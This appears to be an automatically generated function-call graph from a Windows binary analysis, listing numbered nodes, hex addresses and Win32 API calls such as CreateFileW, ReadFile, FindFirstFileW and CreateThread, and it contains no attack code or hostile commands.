46000 cd6d32 45998->46000 45999->45998 45999->45999 46001 cd6d67 46000->46001 46002 cd6d47 Wow64RevertWow64FsRedirection 46000->46002 46003 bb8810 25 API calls 46001->46003 46002->46001 46003->45993 46004 beb0b0 46009 d7fe78 46004->46009 46006 beb0c3 __set_se_translator 46007 beb0eb 46006->46007 46008 beb0d9 SetUnhandledExceptionFilter 46006->46008 46008->46007 46010 d7fe83 46009->46010 46010->46006 46011 cef2c0 46012 cef2f7 46011->46012 46013 cef346 CreateFileW 46012->46013 46014 cef4ce 46012->46014 46017 cef338 46012->46017 46015 cef36f 46013->46015 46016 bba850 HeapAlloc 46014->46016 46018 cef396 GetLastError 46015->46018 46019 cef417 46015->46019 46020 cef4d8 46016->46020 46017->46013 46022 cef3ad 46018->46022 46034 d100a0 46019->46034 46047 cccae0 82 API calls 46022->46047 46023 cef420 46024 cef4ae 46023->46024 46025 cef42a 46023->46025 46042 cf12a0 46024->46042 46028 cef42f GetLastError 46025->46028 46032 cef45d 46025->46032 46030 cef449 46028->46030 46048 cccae0 82 API calls 46030->46048 46033 cef3c5 46039 d100e6 46034->46039 46035 d1013b SetFilePointer 46037 d10162 ReadFile 46035->46037 46038 d10154 GetLastError 46035->46038 46036 d100ed 46036->46023 46037->46036 46037->46039 46038->46036 46038->46037 46039->46035 46039->46036 46040 d10216 SetFilePointer 46039->46040 46040->46036 46041 d1023e ReadFile 46040->46041 46041->46036 46049 cf1f00 46042->46049 46044 cef4bc 46045 cf12af 46045->46044 46066 cf23d0 46045->46066 46047->46033 46048->46032 46050 cf1fed 46049->46050 46051 cf1f4b SetFilePointer 46049->46051 46050->46045 46051->46050 46052 cf2001 46051->46052 46053 bbab90 12 API calls 46052->46053 46054 cf2021 46053->46054 46055 cf233f 46054->46055 46058 cf205f ReadFile 46054->46058 46063 cf2205 46054->46063 46056 bba850 HeapAlloc 46055->46056 46057 cf2349 46056->46057 46059 bba850 HeapAlloc 46057->46059 46060 cf22c1 GetLastError 46058->46060 46058->46063 46061 cf2353 46059->46061 46062 cf22de 46060->46062 46061->46045 46090 cccae0 82 API calls 46062->46090 46063->46045 46065 cf22f8 46065->46055 46067 cf240b SetFilePointer 46066->46067 46070 cf268c 46066->46070 46068 cf24ba 46067->46068 46069 cf2436 GetLastError 46067->46069 46068->46070 46071 cf24e0 ReadFile 46068->46071 46072 cf2450 46069->46072 46070->46044 46073 cf2763 GetLastError 46071->46073 46088 cf2502 46071->46088 46091 cccae0 82 API calls 46072->46091 46074 cf2780 46073->46074 46094 cccae0 82 API calls 46074->46094 46076 bbab90 12 API calls 46076->46088 46078 cf27d9 46080 bba850 HeapAlloc 46078->46080 46079 cf2468 46079->46044 46081 cf27e3 46080->46081 46082 cf2562 ReadFile 46083 cf26b9 GetLastError 46082->46083 46082->46088 46084 cf26d6 46083->46084 46093 cccae0 82 API calls 46084->46093 46085 cf26eb 46085->46070 46088->46070 46088->46071 46088->46073 46088->46076 46088->46078 46088->46082 46088->46083 46088->46085 46089 bba380 26 API calls 46088->46089 46092 bba6d0 26 API calls 2 library calls 46088->46092 46089->46088 46090->46065 46091->46079 46092->46088 46093->46085 46094->46085 46095 be1df0 46096 be1e5b 46095->46096 46098 be1e25 std::ios_base::_Ios_base_dtor 46095->46098 46097 bb8810 25 API calls 46097->46098 46098->46096 46098->46097 46099 d0ba60 46100 d0baa5 46099->46100 46101 d0ba8f 46099->46101 46102 bbab90 12 API calls 46100->46102 46103 d0baaa 46102->46103 46104 bba850 HeapAlloc 46103->46104 46112 d0bab4 46103->46112 46105 d0bbbe 46104->46105 46106 bbab90 12 API calls 46105->46106 46114 d0bbf5 46106->46114 46107 d0bda9 46108 bba850 HeapAlloc 46107->46108 46109 d0bdb3 46108->46109 46110 bba850 HeapAlloc 46109->46110 46111 d0bdbd 46110->46111 46113 bbab90 12 API calls 46113->46114 46114->46107 46114->46109 46114->46113 46115 bc49d0 HeapAlloc 46114->46115 46116 d0bd42 46114->46116 46117 d0bd52 46114->46117 46115->46114 46116->46117 46118 bd1a90 26 API calls 46116->46118 46118->46117 46119 d1f480 46130 d1eba0 46119->46130 46122 d1f4aa 46139 d1f550 46122->46139 46125 d1f4ba 46158 d1f9f0 46125->46158 46127 d1f4c1 46166 d1fc20 46127->46166 46129 d1f4cc 46131 bbcd80 25 API calls 46130->46131 46132 d1ebb8 46131->46132 46133 d1ebd0 46132->46133 46134 bb8810 25 API calls 46132->46134 46137 d1ebf1 46133->46137 46197 d21070 25 API calls std::ios_base::_Ios_base_dtor 46133->46197 46134->46132 46138 d1ec12 46137->46138 46198 bb9400 25 API calls std::ios_base::_Ios_base_dtor 46137->46198 46138->46122 46189 bbcd80 46138->46189 46140 d1f5c0 46139->46140 46142 d1f9bc 46139->46142 46141 bb8190 25 API calls 46140->46141 46148 d1f5dc std::ios_base::_Ios_base_dtor 46141->46148 46142->46125 46143 bb8190 25 API calls 46143->46148 46144 d1f6ff 46145 bb8810 25 API calls 46144->46145 46146 d1f74e 46145->46146 46147 bb8810 25 API calls 46146->46147 46151 d1f75a std::ios_base::_Ios_base_dtor 46147->46151 46148->46143 46148->46144 46149 bb8810 25 API calls 46148->46149 46152 d1f9df 46148->46152 46149->46148 46150 d1f95e 46153 bb8810 25 API calls 46150->46153 46151->46150 46151->46152 46155 bb8190 25 API calls 46151->46155 46157 bb8810 25 API calls 46151->46157 46154 d852ff 25 API calls 46152->46154 46153->46142 46156 d1f9e4 46154->46156 46155->46151 46157->46151 46159 d1fa25 46158->46159 46160 d1fa2c 46158->46160 46159->46127 46161 d1fb37 46160->46161 46163 bb8190 25 API calls 46160->46163 46199 bea7a0 25 API calls 46160->46199 46161->46159 46200 d8a3fe 30 API calls 46161->46200 46201 d21240 26 API calls 46161->46201 46163->46160 46167 d20556 46166->46167 46184 d1fc83 std::ios_base::_Ios_base_dtor __Wcscoll 46166->46184 46167->46129 46168 d7fea9 2 API calls 46168->46184 46173 bbcd80 25 API calls 46173->46184 46175 d20f00 26 API calls 46175->46184 46176 d2058a 46178 d852ff 25 API calls 46176->46178 46177 bb8810 25 API calls 46177->46184 46179 d2058f 46178->46179 46180 bb8190 25 API calls 46180->46184 46184->46167 46184->46168 46184->46173 46184->46175 46184->46176 46184->46177 46184->46180 46185 d20279 46184->46185 46202 d215a0 46184->46202 46232 cc20b0 25 API calls 46184->46232 46233 bbee10 25 API calls 46184->46233 46234 d1e850 11 API calls __Init_thread_footer 46184->46234 46235 cc6fc0 25 API calls 2 library calls 46184->46235 46237 cd0790 25 API calls 2 library calls 46184->46237 46238 d21370 25 API calls std::ios_base::_Ios_base_dtor 46184->46238 46239 d21940 46184->46239 46244 be26a0 25 API calls std::ios_base::_Ios_base_dtor 46184->46244 46185->46184 46188 bb8810 25 API calls 46185->46188 46236 d1f2e0 46 API calls 2 library calls 46185->46236 46188->46185 46191 bbcdcd 46189->46191 46192 bbcd91 46189->46192 46190 bbce81 46191->46190 46193 bb8700 25 API calls 46191->46193 46192->46122 46194 bbce16 46193->46194 46195 bbce65 std::ios_base::_Ios_base_dtor 46194->46195 46196 d852ff 25 API calls 46194->46196 46195->46122 46196->46190 46197->46137 46198->46137 46199->46160 46200->46161 46201->46161 46203 d215f0 46202->46203 46230 d21738 46202->46230 46204 d21792 46203->46204 46207 d21663 46203->46207 46208 d2163c 46203->46208 46249 bb86e0 25 API calls 46204->46249 46206 d852ff 25 API calls 46209 d217a1 46206->46209 46211 d7fea9 2 API calls 46207->46211 46214 d2164d 46207->46214 46208->46204 46210 d21647 46208->46210 46250 d21070 25 API calls std::ios_base::_Ios_base_dtor 46209->46250 46213 d7fea9 2 API calls 46210->46213 46211->46214 46213->46214 46216 d21940 25 API calls 46214->46216 46214->46230 46215 d217ad 46251 bd6690 25 API calls std::ios_base::_Ios_base_dtor 46215->46251 46218 d2169f 46216->46218 46220 d216b1 46218->46220 46221 d216fe 46218->46221 46219 d217bb 46224 d216e4 46220->46224 46227 d21940 25 API calls 46220->46227 46246 d21870 25 API calls 46221->46246 46223 d21709 46247 d21870 25 API calls 46223->46247 46245 d21070 25 API calls std::ios_base::_Ios_base_dtor 46224->46245 46227->46220 46228 d216f3 46231 d2175d std::ios_base::_Ios_base_dtor 46228->46231 46248 d21070 25 API calls std::ios_base::_Ios_base_dtor 46228->46248 46230->46206 46230->46231 46231->46184 46232->46184 46233->46184 46234->46184 46235->46184 46236->46185 46237->46184 46238->46184 46240 d7fea9 2 API calls 46239->46240 46241 d21989 46240->46241 46252 d21b70 46241->46252 46244->46184 46245->46228 46246->46223 46247->46228 46248->46230 46249->46230 46250->46215 46251->46219 46253 d21bb2 46252->46253 46254 d219b4 46252->46254 46255 d7fea9 2 API calls 46253->46255 46254->46184 46256 d21bd4 46255->46256 46257 bb7690 25 API calls 46256->46257 46258 d21bea 46257->46258 46259 bb7690 25 API calls 46258->46259 46260 d21bfa 46259->46260 46261 d21b70 25 API calls 46260->46261 46262 d21c4b 46261->46262 46263 d21b70 25 API calls 46262->46263 46263->46254 46264 d81bac 46272 d84c57 46264->46272 46266 d81bb6 46267 d81bc1 46266->46267 46278 d84d08 6 API calls ___vcrt_FlsSetValue 46266->46278 46269 d81bcf 46270 d81bdc 46269->46270 46271 d81bd5 ___vcrt_uninitialize_ptd 46269->46271 46271->46267 46279 d84b6c 46272->46279 46275 d84c8a TlsAlloc 46276 d84c7a FlsAlloc 46276->46266 46278->46269 46280 d84b89 46279->46280 46284 d84b8d 46279->46284 46280->46275 46280->46276 46281 d84bf5 GetProcAddress 46281->46280 46283 d84c03 46281->46283 46283->46280 46284->46280 46284->46281 46285 d84be6 46284->46285 46287 d84c0c LoadLibraryExW GetLastError LoadLibraryExW ___vcrt_FlsSetValue 46284->46287 46285->46281 46286 d84bee FreeLibrary 46285->46286 46286->46281 46287->46284 46288 d997af 46291 d997bc __cftof 46288->46291 46289 d997e7 RtlAllocateHeap 46290 d997fa __Wcscoll 46289->46290 46289->46291 46291->46289 46291->46290 46293 d954d3 EnterCriticalSection LeaveCriticalSection __cftof 46291->46293 46293->46291 46294 d7c94c 46295 d7c93b 46294->46295 46295->46294 46297 d7d43d 46295->46297 46323 d7d19b 46297->46323 46299 d7d44d 46300 d7d4aa 46299->46300 46311 d7d4ce 46299->46311 46332 d7d3db 6 API calls 3 library calls 46300->46332 46302 d7d4b5 RaiseException 46303 d7d6a3 46302->46303 46303->46295 46304 d7d546 LoadLibraryExA 46305 d7d5a7 46304->46305 46306 d7d559 GetLastError 46304->46306 46310 d7d5b9 46305->46310 46312 d7d5b2 FreeLibrary 46305->46312 46307 d7d582 46306->46307 46308 d7d56c 46306->46308 46333 d7d3db 6 API calls 3 library calls 46307->46333 46308->46305 46308->46307 46309 d7d617 GetProcAddress 46314 d7d627 GetLastError 46309->46314 46319 d7d675 46309->46319 46310->46309 46310->46319 46311->46304 46311->46305 46311->46310 46311->46319 46312->46310 46316 d7d63a 46314->46316 46315 d7d58d RaiseException 46315->46303 46316->46319 46334 d7d3db 6 API calls 3 library calls 46316->46334 46335 d7d3db 6 API calls 3 library calls 46319->46335 46320 d7d65b RaiseException 46321 d7d19b DloadAcquireSectionWriteAccess 6 API calls 46320->46321 46322 d7d672 46321->46322 46322->46319 46324 d7d1a7 46323->46324 46325 d7d1cd 46323->46325 46336 d7d244 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 46324->46336 46325->46299 46327 d7d1ac 46328 d7d1c8 46327->46328 46337 d7d36d VirtualQuery GetSystemInfo VirtualProtect DloadProtectSection 46327->46337 46338 d7d1ce GetModuleHandleW GetProcAddress GetProcAddress 46328->46338 46331 d7d416 46331->46299 46332->46302 46333->46315 46334->46320 46335->46303 46336->46327 46337->46328 46338->46331 46339 cb2170 46340 cb21a7 46339->46340 46344 cb21e7 46339->46344 46341 d80372 6 API calls 46340->46341 46342 cb21b1 46341->46342 46342->46344 46345 d80328 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 46342->46345 46345->46344 46346 cc1850 46347 cc189b 46346->46347 46350 cc1888 46346->46350 46352 cb1130 31 API calls 2 library calls 46347->46352 46349 cc18a5 46351 bb8810 25 API calls 46349->46351 46351->46350 46352->46349 46353 bc8da1 46354 bc8e27 46353->46354 46355 bc8e9b 46354->46355 46356 bc8e4c GetWindowLongW CallWindowProcW 46354->46356 46357 bc8e36 CallWindowProcW 46354->46357 46356->46355 46358 bc8e80 GetWindowLongW 46356->46358 46357->46355 46358->46355 46359 bc8e8d SetWindowLongW 46358->46359 46359->46355 46360 ce64f0 46379 cef5c0 46360->46379 46362 ce652c 46363 ce6667 46362->46363 46364 ce6543 CreateFileW 46362->46364 46365 ce6581 SetFilePointer 46364->46365 46368 ce6570 46364->46368 46367 ce65ae 46365->46367 46365->46368 46366 ce665a FindCloseChangeNotification 46366->46363 46369 cae930 38 API calls 46367->46369 46368->46363 46368->46366 46370 ce65bd 46369->46370 46371 ce65ca 46370->46371 46372 ce65d8 ReadFile 46370->46372 46373 bba550 26 API calls 46371->46373 46374 ce65fd 46372->46374 46375 ce65eb 46372->46375 46376 ce65d5 46373->46376 46374->46368 46378 ce662a 46374->46378 46375->46374 46377 d092e0 89 API calls 46375->46377 46376->46372 46377->46374 46378->46363 46380 cef667 46379->46380 46387 cf1100 HeapAlloc 46380->46387 46382 cef66e 46383 bbab90 12 API calls 46382->46383 46384 cef73e 46383->46384 46385 bba850 HeapAlloc 46384->46385 46386 cef797 46385->46386 46387->46382 46388 be0d20 46389 d7fea9 2 API calls 46388->46389 46390 be0d64 46389->46390 46393 bce010 25 API calls std::ios_base::_Ios_base_dtor 46390->46393 46392 be0daf 46393->46392 46394 cf09f0 46395 cf0a2e 46394->46395 46396 cf0ab6 46394->46396 46426 cf1300 HeapAlloc 46395->46426 46489 cf1140 94 API calls 46396->46489 46399 cf0ac0 46401 bd1a90 26 API calls 46399->46401 46400 cf0a36 46402 cf0b25 46400->46402 46403 cf0a49 46400->46403 46408 cf0ab2 46401->46408 46404 bba850 HeapAlloc 46402->46404 46409 bd1a90 26 API calls 46403->46409 46405 cf0b2f 46404->46405 46406 cf0b65 46405->46406 46421 cf0be1 46405->46421 46407 cf0bcb 46406->46407 46410 bbab90 12 API calls 46406->46410 46411 cf0a70 46409->46411 46413 cf0b6f 46410->46413 46479 cf1370 46411->46479 46412 cf0cb5 46416 bba850 HeapAlloc 46412->46416 46414 cf0cbf 46413->46414 46415 cf0b79 46413->46415 46420 bba850 HeapAlloc 46414->46420 46427 cf0cd0 46415->46427 46416->46414 46418 cf0c63 46425 cf0b9e 46418->46425 46497 d89d16 46418->46497 46422 cf0cc9 46420->46422 46421->46412 46421->46418 46490 ced7e0 46421->46490 46426->46400 46500 cf1100 HeapAlloc 46427->46500 46429 cf0d1d 46430 ced7e0 3 API calls 46429->46430 46431 cf0d34 46429->46431 46430->46431 46432 bd1a90 26 API calls 46431->46432 46433 cf0d61 46432->46433 46434 cf102e 46433->46434 46435 cf101a 46433->46435 46438 cf0ddf 46433->46438 46437 bba850 HeapAlloc 46434->46437 46436 bba850 HeapAlloc 46435->46436 46439 cf1024 46436->46439 46440 cf1038 46437->46440 46636 ccc040 86 API calls 2 library calls 46438->46636 46442 bba850 HeapAlloc 46439->46442 46442->46434 46443 cf0df0 46501 bd11b0 46443->46501 46445 cf0e01 46446 cf0e18 46445->46446 46447 bbab90 12 API calls 46445->46447 46446->46445 46448 cf0e25 46447->46448 46448->46439 46449 cf0e2f 46448->46449 46450 cf0e4d 46449->46450 46451 cf0e58 46449->46451 46452 bba140 29 API calls 46450->46452 46637 cb6270 46451->46637 46458 cf0e56 46452->46458 46454 cf0e62 _wcsrchr 46455 cf0e9c 46454->46455 46454->46458 46456 cf0eb0 46455->46456 46575 cf1100 HeapAlloc 46455->46575 46456->46455 46458->46454 46458->46455 46460 bd11b0 94 API calls 46458->46460 46459 cf0ec1 46461 cf0ecd 46459->46461 46462 cf0ee6 46459->46462 46460->46455 46463 cf0ee1 46461->46463 46466 ced7e0 3 API calls 46461->46466 46462->46463 46464 ced7e0 3 API calls 46462->46464 46648 cf27f0 46463->46648 46467 cf0f13 46464->46467 46466->46463 46576 cf3e10 46467->46576 46468 cf0fad 46471 d89d16 ___std_exception_destroy 2 API calls 46468->46471 46476 cf0f48 46468->46476 46470 cf0f20 46473 cf0f59 46470->46473 46477 cf0f37 46470->46477 46471->46476 46472 cf0fec 46472->46425 46473->46463 46475 d89d16 ___std_exception_destroy 2 API calls 46473->46475 46474 d89d16 ___std_exception_destroy 2 API calls 46474->46472 46475->46463 46476->46472 46476->46474 46477->46476 46478 d89d16 ___std_exception_destroy 2 API calls 46477->46478 46478->46476 46480 cf13a5 46479->46480 46481 bba850 HeapAlloc 46480->46481 46486 cf13ae 46480->46486 46482 cf1baa 46481->46482 46483 bba850 HeapAlloc 46482->46483 46484 cf1bb4 46483->46484 46485 bba850 HeapAlloc 46484->46485 46487 cf1bbe 46485->46487 46486->46408 46488 bba850 HeapAlloc 46487->46488 46489->46399 46491 ced81a 46490->46491 46495 ced82b 46490->46495 46492 bba850 HeapAlloc 46491->46492 46491->46495 46493 ced8b5 46492->46493 46494 ced8f1 46493->46494 46496 d89d16 ___std_exception_destroy 2 API calls 46493->46496 46494->46421 46495->46421 46496->46494 46980 d9820d 46497->46980 46499 d89d2e 46499->46425 46500->46429 46508 bd1241 46501->46508 46510 bd11d6 __Wcscoll 46501->46510 46502 bba850 HeapAlloc 46503 bd128c 46502->46503 46504 bd12fb 46503->46504 46505 bd12ee FindClose 46503->46505 46718 bba4a0 HeapAlloc 46504->46718 46505->46504 46506 bd126f 46506->46445 46508->46502 46508->46506 46509 bd1317 46511 bbab90 12 API calls 46509->46511 46510->46508 46717 d852ef 25 API calls __cftof 46510->46717 46516 bd1329 46511->46516 46513 bd16dc 46514 bba850 HeapAlloc 46513->46514 46515 bd16e6 46514->46515 46517 bba380 26 API calls 46515->46517 46516->46513 46518 bd1351 46516->46518 46521 bd135f 46516->46521 46519 bd172f 46517->46519 46520 bba140 29 API calls 46518->46520 46523 bd192c 46519->46523 46525 bd1950 46519->46525 46538 bd1765 46519->46538 46524 bd135d 46520->46524 46521->46521 46719 bba6d0 26 API calls 2 library calls 46521->46719 46523->46445 46526 bd15cc 46524->46526 46528 bd14f5 FindFirstFileW 46524->46528 46529 bd13a6 PathIsUNCW 46524->46529 46527 bba850 HeapAlloc 46525->46527 46526->46445 46533 bd195a 46527->46533 46528->46526 46532 bd150d GetFullPathNameW 46528->46532 46530 bd13bb 46529->46530 46531 bd1485 46529->46531 46720 bc4a70 38 API calls 2 library calls 46530->46720 46770 bc4a70 38 API calls 2 library calls 46531->46770 46536 bd1526 46532->46536 46574 bd1661 46532->46574 46537 bd1541 GetFullPathNameW 46536->46537 46541 bd155a 46537->46541 46540 bd11b0 86 API calls 46538->46540 46539 bba850 HeapAlloc 46539->46513 46542 bd17a1 46540->46542 46543 bd1606 46541->46543 46553 bd158e 46541->46553 46541->46574 46542->46523 46544 bd17d4 PathIsUNCW 46542->46544 46557 bd1618 _wcsrchr 46543->46557 46772 bba550 26 API calls 2 library calls 46543->46772 46546 bd17e8 46544->46546 46547 bd18b7 46544->46547 46545 bd13c3 46545->46528 46721 bc4e60 46545->46721 46776 bc4a70 38 API calls 2 library calls 46546->46776 46777 bc4a70 38 API calls 2 library calls 46547->46777 46552 bd15c4 SetLastError 46552->46526 46553->46552 46559 bd15b7 FindClose 46553->46559 46555 bd143e 46556 bd1a90 26 API calls 46555->46556 46560 bd1451 46556->46560 46558 bd1638 _wcsrchr 46557->46558 46773 bba550 26 API calls 2 library calls 46557->46773 46564 bd164b 46558->46564 46566 bd1665 46558->46566 46559->46552 46560->46528 46562 bd1476 46560->46562 46771 bd1960 26 API calls 2 library calls 46562->46771 46563 bd17f0 46563->46523 46567 bc4e60 82 API calls 46563->46567 46565 bd16b3 46564->46565 46564->46574 46774 bba550 26 API calls 2 library calls 46564->46774 46565->46526 46566->46574 46775 bba550 26 API calls 2 library calls 46566->46775 46568 bd1871 46567->46568 46572 bd1a90 26 API calls 46568->46572 46573 bd1883 46572->46573 46573->46523 46778 bd1960 26 API calls 2 library calls 46573->46778 46574->46539 46574->46565 46575->46459 46577 cf4246 46576->46577 46614 cf3e6a 46576->46614 46577->46470 46578 cf4289 46579 bba850 HeapAlloc 46578->46579 46580 cf4293 46579->46580 46581 bba850 HeapAlloc 46580->46581 46583 cf429d 46581->46583 46582 bba380 26 API calls 46582->46614 46587 cf42e8 46583->46587 46829 bba550 26 API calls 2 library calls 46583->46829 46584 bbab90 12 API calls 46584->46614 46586 cf427f 46589 bba850 HeapAlloc 46586->46589 46588 cf43e2 46587->46588 46591 cf4337 46587->46591 46830 cccae0 82 API calls 46587->46830 46616 cf43fe 46588->46616 46783 cccf10 46588->46783 46589->46578 46590 cf4028 FindFirstFileW 46592 cf4063 FindClose 46590->46592 46622 cf3f1d __Wcscoll 46590->46622 46595 cf43c9 46591->46595 46600 bbab90 12 API calls 46591->46600 46592->46622 46594 cf4524 46594->46470 46595->46470 46597 bbab90 12 API calls 46597->46622 46598 cf431c 46598->46588 46598->46591 46599 bbab90 12 API calls 46599->46616 46602 cf4349 46600->46602 46601 d104e0 HeapAlloc CreateFileW 46601->46622 46603 cf453a 46602->46603 46604 cf4351 46602->46604 46605 bba850 HeapAlloc 46603->46605 46606 bd11b0 94 API calls 46604->46606 46612 cf4544 46605->46612 46608 cf4374 46606->46608 46607 cf4203 46607->46577 46615 cf4235 CloseHandle 46607->46615 46610 cf4399 46608->46610 46619 cf438b 46608->46619 46609 cf444d CreateFileW 46808 ccaaa0 46609->46808 46831 cff8f0 54 API calls 46610->46831 46618 bba850 HeapAlloc 46612->46618 46614->46577 46614->46578 46614->46580 46614->46582 46614->46584 46614->46586 46621 cf418b CloseHandle 46614->46621 46614->46622 46615->46577 46616->46594 46616->46599 46616->46603 46616->46609 46623 cf44bd SetFilePointer SetEndOfFile 46616->46623 46617 cf41b1 46617->46607 46624 cf459f 46618->46624 46625 bd11b0 94 API calls 46619->46625 46620 cf43a7 46620->46595 46621->46614 46622->46586 46622->46590 46622->46597 46622->46601 46622->46614 46622->46617 46623->46616 46626 cf44e6 FindCloseChangeNotification 46623->46626 46627 cf4686 46624->46627 46629 cf46c2 46624->46629 46625->46610 46626->46616 46628 cf4699 46627->46628 46630 d89d16 ___std_exception_destroy 2 API calls 46627->46630 46628->46470 46631 bba850 HeapAlloc 46629->46631 46630->46628 46632 cf46cc 46631->46632 46633 cf4737 std::ios_base::_Ios_base_dtor 46632->46633 46634 d852ff 25 API calls 46632->46634 46633->46470 46635 cf476c 46634->46635 46636->46443 46638 cb62da 46637->46638 46639 cb627d MultiByteToWideChar 46637->46639 46918 bba4a0 HeapAlloc 46638->46918 46639->46638 46640 cb6295 46639->46640 46642 cb62b0 MultiByteToWideChar 46640->46642 46644 cb62e9 46642->46644 46645 cb62c7 46642->46645 46643 cb62e1 46643->46454 46646 bba850 HeapAlloc 46644->46646 46645->46454 46647 cb62f3 46646->46647 46649 bbab90 12 API calls 46648->46649 46650 cf2844 46649->46650 46651 cf39de 46650->46651 46653 bbab90 12 API calls 46650->46653 46652 bba850 HeapAlloc 46651->46652 46654 cf286a 46653->46654 46654->46651 46656 bd1a90 26 API calls 46654->46656 46681 cf296c 46654->46681 46655 bbab90 12 API calls 46710 cf29e3 std::ios_base::_Ios_base_dtor __Wcscoll 46655->46710 46660 cf28b0 46656->46660 46657 cf35cb 46926 d11610 46657->46926 46658 bd1a90 26 API calls 46662 cf2915 46658->46662 46660->46658 46661 cf39c5 46660->46661 46663 bba850 HeapAlloc 46661->46663 46662->46661 46672 cf2935 46662->46672 46666 cf39cf 46663->46666 46664 d7fea9 2 API calls 46664->46710 46665 cf3616 46667 cf37ab 46665->46667 46673 cf363d CreateEventW 46665->46673 46674 cf3672 CreateThread 46665->46674 46668 bba850 HeapAlloc 46666->46668 46669 cf37cd CloseHandle 46667->46669 46670 cf375a 46667->46670 46671 cf39d9 46668->46671 46669->46670 46675 cf3806 CloseHandle 46670->46675 46676 cf3813 46670->46676 46679 d852ff 25 API calls 46671->46679 46680 bd11b0 94 API calls 46672->46680 46683 cf3653 46673->46683 46677 cf36ab 46674->46677 46678 cf36b2 WaitForSingleObject GetExitCodeThread 46674->46678 46675->46676 46965 cb6ea0 RtlFreeHeap GetLastError ___std_exception_destroy 46676->46965 46677->46678 46685 cf36d1 46678->46685 46679->46651 46680->46681 46681->46655 46682 bbab90 12 API calls 46682->46710 46683->46674 46685->46667 46686 cf3927 46687 d89d16 ___std_exception_destroy 2 API calls 46686->46687 46688 cf393e 46686->46688 46687->46688 46688->46468 46689 cf3853 std::ios_base::_Ios_base_dtor 46689->46666 46689->46686 46690 cf38f5 CloseHandle 46689->46690 46690->46689 46691 bd1a90 26 API calls 46691->46710 46692 bb8190 25 API calls 46692->46710 46693 bb7690 25 API calls 46693->46710 46695 d104e0 HeapAlloc CreateFileW 46714 cf2d28 std::ios_base::_Ios_base_dtor __Wcscoll 46695->46714 46696 bba380 26 API calls 46696->46710 46698 cf370a 46698->46670 46699 cccf10 112 API calls 46699->46710 46701 ccaaa0 28 API calls 46701->46710 46703 cbf600 25 API calls 46703->46710 46705 bb8810 25 API calls 46705->46710 46706 cf3361 FindFirstFileW 46707 cf33b5 FindClose 46706->46707 46706->46714 46707->46714 46709 cf3730 46715 bb8810 25 API calls 46709->46715 46710->46651 46710->46657 46710->46664 46710->46666 46710->46671 46710->46682 46710->46691 46710->46692 46710->46693 46710->46696 46710->46699 46710->46701 46710->46703 46710->46705 46712 bba140 29 API calls 46710->46712 46710->46714 46920 cbed90 25 API calls std::ios_base::_Ios_base_dtor 46710->46920 46921 cbea30 25 API calls 46710->46921 46922 cbf2d0 25 API calls 46710->46922 46923 bba6d0 26 API calls 2 library calls 46710->46923 46924 cb3940 13 API calls 46710->46924 46711 bba380 26 API calls 46711->46714 46712->46710 46714->46695 46714->46698 46714->46706 46714->46709 46714->46710 46714->46711 46716 bb8810 25 API calls 46714->46716 46919 bba6d0 26 API calls 2 library calls 46714->46919 46925 bba6d0 26 API calls 2 library calls 46714->46925 46715->46670 46716->46714 46717->46508 46718->46509 46719->46524 46720->46545 46722 bc4eb7 46721->46722 46723 bc4ff0 46721->46723 46726 bc4f09 46722->46726 46727 bc4ed9 46722->46727 46724 bba850 HeapAlloc 46723->46724 46725 bc4ffa 46724->46725 46780 bba610 26 API calls 46725->46780 46731 bbab90 12 API calls 46726->46731 46739 bc4f1b 46726->46739 46729 bba380 26 API calls 46727->46729 46732 bc4ee1 46729->46732 46730 bc4fff 46733 bba850 HeapAlloc 46730->46733 46731->46739 46732->46555 46734 bc5009 46733->46734 46735 bba850 HeapAlloc 46734->46735 46736 bc5013 46735->46736 46737 bc50dd 46736->46737 46738 bc505a 46736->46738 46748 bc52c9 46737->46748 46751 bc515b SetWindowTextW 46737->46751 46740 bc50bf GetWindowLongW 46738->46740 46741 bc5061 46738->46741 46739->46725 46739->46730 46739->46734 46742 bc4f43 46739->46742 46747 bc50cc 46740->46747 46743 bc52a7 NtdllDefWindowProc_W 46741->46743 46744 bc5082 GetWindowLongW 46741->46744 46742->46734 46750 bc4f83 __Wcscoll 46742->46750 46746 bc52f6 46743->46746 46744->46743 46745 bc5098 GetWindowLongW SetWindowLongW NtdllDefWindowProc_W 46744->46745 46745->46746 46746->46555 46747->46743 46748->46746 46755 d89d16 ___std_exception_destroy 2 API calls 46748->46755 46749 bc4f9f 46749->46555 46750->46749 46779 d852ef 25 API calls __cftof 46750->46779 46753 bc5177 46751->46753 46754 bc517d 46751->46754 46753->46754 46756 bc520b 46754->46756 46757 bc5193 GlobalAlloc 46754->46757 46755->46746 46756->46748 46782 bc5580 59 API calls 3 library calls 46756->46782 46757->46756 46758 bc51a3 GlobalLock 46757->46758 46762 bc51b8 __Wcscoll 46758->46762 46760 bc523e 46761 bc52b7 46760->46761 46765 bc5257 SetWindowLongW 46760->46765 46761->46748 46764 bc51bd 46762->46764 46781 d852ef 25 API calls __cftof 46762->46781 46766 bc51f1 GlobalUnlock 46764->46766 46768 bc526b 46765->46768 46766->46756 46767 bc529a 46767->46747 46768->46767 46769 d89d16 ___std_exception_destroy 2 API calls 46768->46769 46769->46767 46770->46560 46771->46528 46772->46557 46773->46558 46774->46574 46775->46574 46776->46563 46777->46573 46778->46523 46779->46749 46780->46730 46781->46764 46782->46760 46784 ccc960 4 API calls 46783->46784 46785 cccf41 46784->46785 46786 cccf59 PathIsUNCW 46785->46786 46787 cccf45 46785->46787 46832 cccb90 46786->46832 46787->46616 46789 cccf8e 46790 ccd121 46789->46790 46792 bba380 26 API calls 46789->46792 46791 bba850 HeapAlloc 46790->46791 46793 ccd12b CreateFileW 46791->46793 46804 cccfa5 46792->46804 46794 ccd18c GetFileSize 46793->46794 46795 ccd19a 46793->46795 46794->46795 46797 ccd1b4 CloseHandle 46795->46797 46798 ccd1c2 46795->46798 46797->46798 46798->46616 46799 bba380 26 API calls 46799->46804 46800 ccd0a7 46800->46616 46801 bd11b0 94 API calls 46802 ccd014 CreateDirectoryW 46801->46802 46803 ccd028 GetLastError 46802->46803 46802->46804 46803->46804 46804->46790 46804->46799 46804->46801 46805 ccaaa0 28 API calls 46804->46805 46806 ccd046 46804->46806 46807 bd11b0 94 API calls 46804->46807 46805->46804 46906 cb6ea0 RtlFreeHeap GetLastError ___std_exception_destroy 46806->46906 46807->46804 46809 ccaada 46808->46809 46814 ccaaeb 46808->46814 46812 ccab7d 46809->46812 46809->46814 46810 ccab3b 46810->46616 46811 bba380 26 API calls 46811->46810 46813 bba850 HeapAlloc 46812->46813 46816 ccab87 